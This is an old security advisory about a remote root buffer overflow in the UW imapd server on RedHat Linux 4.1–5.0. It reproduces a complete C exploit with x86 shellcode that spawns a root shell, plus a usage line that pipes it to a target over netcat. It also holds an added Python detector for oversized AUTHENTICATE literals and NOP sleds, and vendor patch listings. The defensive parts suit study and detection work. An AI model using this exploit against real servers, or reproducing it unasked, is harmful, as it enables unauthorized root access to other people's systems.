COMMAND
imapd
SYSTEMS AFFECTED
RedHat Linux 4.1, 4.2, 5.0
PROBLEM
Taeho Oh posted the following. He wrote an imapd exploit for the RedHat
Linux system. Check out imapd #2 in the 'mUNIXes' section for more
details. Here it goes:
/*
   Imapd exploit code for x86 linux
   Remote user can gain root access.
   Tested redhat linux : 4.1 , 4.2 and 5.0.
   Tested imapd version : 9.0, 10.166, 10.190, 10.205 and 10.223.

   Usage
     $ ( imapd-ex 0 ; cat ) | nc target.com 143
                  |
                  +------ try from -3000 to 3000 ( try in steps of 500 )

   How to patch imapd buffer overflow bug
     See http://www.cert.org/advisories/CA-98.09.imapd.html

   This program is for demonstrative use only.
   USE IT AT YOUR OWN RISK!

   Programmed by Taeho Oh 1998/09/23
   Taeho Oh ( ohhara@postech.ac.kr ) http://ohhara.postech.ac.kr
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen() was used without a prototype in the original */
#include <stdint.h>   /* uint32_t: the written address is 4 bytes on x86 Linux */

#define OFFSET       0
#define RET_POSITION 1032
#define RANGE        20
#define NOP          0x90

char shellcode[1024]=
  "\xeb\x38"                      /* jmp 0x38 */
  "\x5e"                          /* popl %esi */
  "\x80\x46\x01\x50"              /* addb $0x50,0x1(%esi) */
  "\x80\x46\x02\x50"              /* addb $0x50,0x2(%esi) */
  "\x80\x46\x03\x50"              /* addb $0x50,0x3(%esi) */
  "\x80\x46\x05\x50"              /* addb $0x50,0x5(%esi) */
  "\x80\x46\x06\x50"              /* addb $0x50,0x6(%esi) */
  "\x89\xf0"                      /* movl %esi,%eax */
  "\x83\xc0\x08"                  /* addl $0x8,%eax */
  "\x89\x46\x08"                  /* movl %eax,0x8(%esi) */
  "\x31\xc0"                      /* xorl %eax,%eax */
  "\x88\x46\x07"                  /* movb %eax,0x7(%esi) */
  "\x89\x46\x0c"                  /* movl %eax,0xc(%esi) */
  "\xb0\x0b"                      /* movb $0xb,%al */
  "\x89\xf3"                      /* movl %esi,%ebx */
  "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx */
  "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx */
  "\xcd\x80"                      /* int $0x80 */
  "\x31\xdb"                      /* xorl %ebx,%ebx */
  "\x89\xd8"                      /* movl %ebx,%eax */
  "\x40"                          /* inc %eax */
  "\xcd\x80"                      /* int $0x80 */
  "\xe8\xc3\xff\xff\xff"          /* call -0x3d */
  "\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh" */ /* /bin/sh is disguised */

int main(int argc,char **argv)
{
  char buff[RET_POSITION+RANGE+1],*ptr;
  uint32_t *addr_ptr,addr;
  unsigned long sp;
  int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
  int i;

  if(argc>1)
    offset=atoi(argv[1]);

  /* guessed stack address, adjusted by the command-line offset */
  sp=0xbffff29f;
  addr=sp-offset;

  /* fill the whole buffer with the guessed address, one 4-byte word at a time
     (the original loop ran 3 bytes past the end of buff; bounded here, the
     output is unchanged because buff[bsize-1] is overwritten below anyway) */
  ptr=buff;
  addr_ptr=(uint32_t*)ptr;
  for(i=0;i+4<=bsize;i+=4)
    *(addr_ptr++)=addr;

  /* NOP sled in front of the shellcode */
  for(i=0;i<bsize-RANGE*2-(int)strlen(shellcode);i++)
    buff[i]=NOP;

  /* shellcode after the sled, leaving RANGE*2 bytes of addresses at the end */
  ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
  for(i=0;i<(int)strlen(shellcode);i++)
    *(ptr++)=shellcode[i];
  buff[bsize-1]='\0';

  /* send the buffer as an IMAP literal: "* AUTHENTICATE {1053}" then the bytes */
  printf("* AUTHENTICATE {%d}\r\n",bsize);
  for(i=0;i<bsize;i++)
    putchar(buff[i]);
  printf("\r\n");
  return 0;
}
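A defender-side check that complements the advisory above. This is an added example, not part of the original post and not Taeho Oh's code: a small parser that walks a captured client-to-server IMAP byte stream, finds AUTHENTICATE commands whose argument arrives as a counted literal ({N}, or {N+} with LITERAL+), flags any literal larger than an assumed threshold (64 bytes; a real SASL mechanism name is a few characters), and reports whether the literal body contains a run of 0x90 NOP bytes. The sample sessions are constructed inline; the threshold and the 16-byte NOP-run cut-off are assumptions. It goes a little beyond the exploit's exact framing by also handling the LITERAL+ form and a mechanism name before the literal.

```python
import re
from dataclasses import dataclass
from typing import List

# An IMAP AUTHENTICATE command whose argument arrives as a counted literal,
# "{N}" (or "{N+}" with LITERAL+).  The exploit above sends exactly this shape:
# "* AUTHENTICATE {1053}" followed by 1053 octets.
AUTH_LITERAL_RE = re.compile(
    rb"^(?P<tag>\S+)[ \t]+AUTHENTICATE[ \t]+(?:\S+[ \t]+)?\{(?P<size>\d+)\+?\}[ \t]*$",
    re.IGNORECASE,
)

# A run of 16 or more 0x90 bytes: a NOP sled.  16 is an assumed cut-off; no
# SASL exchange legitimately contains such a run.
NOP_SLED_RE = re.compile(rb"\x90{16,}")


@dataclass
class Finding:
    tag: str            # client tag on the command line ("*" in the exploit)
    declared_size: int  # byte count announced in the literal
    nop_sled: bool      # literal body contained a NOP run


def scan_imap_stream(data: bytes, max_literal: int = 64) -> List[Finding]:
    """Walk client->server IMAP bytes and report AUTHENTICATE literals that
    exceed max_literal bytes (assumed threshold: mechanism names are short)."""
    findings: List[Finding] = []
    pos = 0
    while pos < len(data):
        eol = data.find(b"\r\n", pos)
        if eol < 0:
            break
        line = data[pos:eol]
        pos = eol + 2
        m = AUTH_LITERAL_RE.match(line)
        if m is None:
            continue
        size = int(m.group("size"))
        # Literal octets follow the CRLF and are not line-structured, so
        # consume them by count instead of splitting on line endings.
        body = data[pos:pos + size]
        pos += size
        if size > max_literal:
            findings.append(Finding(
                tag=m.group("tag").decode("ascii", "replace"),
                declared_size=size,
                nop_sled=NOP_SLED_RE.search(body) is not None,
            ))
    return findings


# Constructed sample sessions (not real captures).
BENIGN_SESSION = (
    b"a001 AUTHENTICATE PLAIN\r\n"
    b"AGpvZQBzZWNyZXQ=\r\n"
    b"a002 AUTHENTICATE {5}\r\n"   # small literal: legitimate
    b"PLAIN\r\n"
    b"a003 SELECT INBOX\r\n"
)

OVERSIZED_SESSION = (
    b"* AUTHENTICATE {1053}\r\n"             # same framing as the exploit
    + b"\x90" * 1000 + b"A" * 53 + b"\r\n"   # sled followed by filler
    + b"a004 AUTHENTICATE PLAIN {300+}\r\n"  # LITERAL+ form, no sled
    + b"B" * 300 + b"\r\n"
)

if __name__ == "__main__":
    for name, session in (("benign", BENIGN_SESSION), ("oversized", OVERSIZED_SESSION)):
        for f in scan_imap_stream(session):
            print(f"{name}: tag={f.tag} literal={f.declared_size} nop_sled={f.nop_sled}")
```

The literal is consumed by its announced byte count rather than by splitting on CRLF, because the body of an overflow attempt is arbitrary binary and may itself contain line endings; only the command line in front of it is text.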
SOLUTION
This will be fixed in the Pine 4.01 maintenance release, but in
the meantime, if you are using the UW IMAP server, please update
it with the following distribution:
ftp://ftp.cac.washington.edu/mail/imap.tar.Z
IMAP Server Vendors Info:
NEC Corporation
===============
The University of Washington imapd is shipped with our product
"Mobilenet/IMAP" and so it is vulnerable.
Netscape
========
Netscape Messaging Server 3.55 and before are susceptible to
this vulnerability. However, it should be noted that Netscape
Messaging Server (any version) does NOT run as root and
therefore, the exposure is much more limited than the
University of Washington example. Regardless, we have
released a patch available at:
http://help.netscape.com/products/server/messaging
which addresses this vulnerability.
Sun Microsystems
================
Sun Microsystems is working on patches for Solstice Internet
Mail Server product versions 2.0, 3.1 and 3.2.
Caldera Linux
=============
Releasing patched imap-4.1; will release imap-4.2 as soon as
it becomes available at:
ftp://ftp.caldera.com/pub/OpenLinux/updates/1.2/010
FreeBSD
=======
FreeBSD does not ship default with imap. However, there is a
version of imapd from Washington University in the FreeBSD
ports collections, known as imap-uw. If anyone is using the
imap port, we suggest fetching the latest revision of imap and
manually installing it, or waiting until the FreeBSD port is updated
and reinstalling imap-uw using the ports system. You can check
the ports status at:
http://www.freebsd.org/ports/mail.html
IBM Corporation
===============
The version of imapd shipped with AIX 4.2 and 4.3 is
vulnerable. We are currently working on the following fixes
which will be available soon:
AIX 4.2.x: IX80446
AIX 4.3.x: IX80447
RedHat
======
Patches:
rpm -Uvh ftp://ftp.redhat.com/updates/5.0/i386/imap-4.1.final-1.i386.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/5.0/alpha/imap-4.1.final-1.alpha.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/5.0/sparc/imap-4.1.final-1.sparc.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/4.2/i386/imap-4.1.final-0.i386.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/4.2/alpha/imap-4.1.final-0.alpha.rpm
rpm -Uvh ftp://ftp.redhat.com/updates/4.2/sparc/imap-4.1.final-0.sparc.rpm
The Santa Cruz Operation, Inc.
==============================
The SCO UnixWare 7 product is vulnerable. Binary versions of
University of Washington imapd will be available shortly from
the SCO ftp site:
ftp://ftp.sco.com/SSE/sse014.ltr - cover letter
ftp://ftp.sco.com/SSE/sse014.tar.Z - replacement binaries
Silicon Graphics Inc.
=====================
Silicon Graphics distributes a freeware University of
Washington imapd daemon called fw_imap which is available from
the web via
http://freeware.sgi.com/
Sun Microsystems Inc.
=====================
Sun recommends that you install the patches listed below
immediately on systems using Sun Internet Mail Server(SIMS)
3.2 and 2.0. The following patches are available in relation
to the above problem:
SIMS      Patch ID
_____     _________
3.2       105935-09
3.2_x86   105936-09
2.0       105346-07
2.0_x86   105347-07
Note: Sun recommends that sites using SIMS 3.1 or 3.1_x86 upgrade
to 3.2 or 3.2_x86 and apply the corresponding patches referenced
above.